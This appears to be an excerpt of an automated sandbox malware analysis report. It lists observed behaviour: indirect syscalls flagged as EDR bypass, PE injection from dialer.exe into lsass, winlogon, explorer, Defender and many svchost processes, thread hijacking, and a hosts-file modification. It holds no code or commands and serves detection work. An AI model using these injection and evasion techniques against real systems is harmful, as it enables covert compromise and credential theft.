Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 40E4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A653273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 29CE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7B15273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 621A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F48273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8B4B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 683D273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C35273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2E26273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6C5E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D593273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC69273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 7897273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 33B4273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 8D0A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: AB4C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2A64273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 6CF3273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 641A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4935273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 60D8273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5E7B273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2F7C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E815273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5234273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9DA9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 602E273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 99A1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FC96273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: A325273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: C222273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 989C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: EFAE273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 39DB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 4453273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2C42273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: F453273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BB95273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: D26C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1E7C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 2D9273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 13C273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E904273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: FCE6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 9B4F273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 1BD7273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 136273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: BB273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: E6273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 66A273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 5C1273C
Source: C:\Windows\System32\dialer.exe	Thread created: unknown EIP: 66A273C

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtEnumerateValueKey: Indirect: 0x2DC293D
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtEnumerateValueKey: Indirect: 0x2DC290E
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtQuerySystemInformation: Indirect: 0x1ED3205D
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtEnumerateValueKey: Indirect: 0x1ED3290E
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtDeviceIoControlFile: Indirect: 0x1ED32B9D
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtEnumerateValueKey: Indirect: 0x1ED3293D
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtQuerySystemInformation: Indirect: 0x1ED32F57
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtResumeThread: Indirect: 0x1ED3231E
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtEnumerateKey: Indirect: 0x1ED32842
Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe	NtEnumerateKey: Indirect: 0x1ED32875

Injects a PE file into a foreign processes

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAF190000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\RuntimeBroker.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E29CE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: C350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22399A10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BFFC960000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FBA3250000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D4C2220000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1F2989C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 25EEFAE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23839DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 17644530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B42C420000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BCF4530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B0BB950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 216D26C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 1E7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\WmiPrvSE.exe base: 1B4E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\WmiPrvSE.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 150E9040000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 267FCE60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\PING.EXE base: 2359B4F0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\RuntimeBroker.exe base: 1BD70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\RuntimeBroker.exe base: 1360000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: E60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 289066A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E205C10000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E2066A0000 value starts with: 4D5A

Injects code into the Windows Explorer (explorer.exe)

Source: C:\Windows\System32\dialer.exe

Memory written: PID: 2580 base: C350000 value: 4D

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

Thread register set: target process: 7964

Jump to behavior

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\GargantuanS.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAF190000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B380000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\RuntimeBroker.exe base: 1300000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5644B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166940000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E29CE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\explorer.exe base: C350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC690000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D178970000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 22399A10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BFFC960000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1FBA3250000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1D4C2220000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1F2989C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\dllhost.exe base: 25EEFAE0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23839DB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 17644530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1B42C420000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BCF4530000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B0BB950000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\PerfDll\hyperProviderSavesinto.exe base: 15C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 216D26C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 1E7C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe base: 2D90000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\WmiPrvSE.exe base: 1B4E0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\WmiPrvSE.exe base: 13C0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\cmd.exe base: 150E9040000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\conhost.exe base: 267FCE60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\PING.EXE base: 2359B4F0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\RuntimeBroker.exe base: 1BD70000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Recovery\RuntimeBroker.exe base: 1360000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: BB0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\Provisioning\Packages\KZcLqgnLvRf.exe base: E60000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 289066A0000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E205C10000
Source: C:\Windows\System32\dialer.exe	Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E2066A0000

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exe

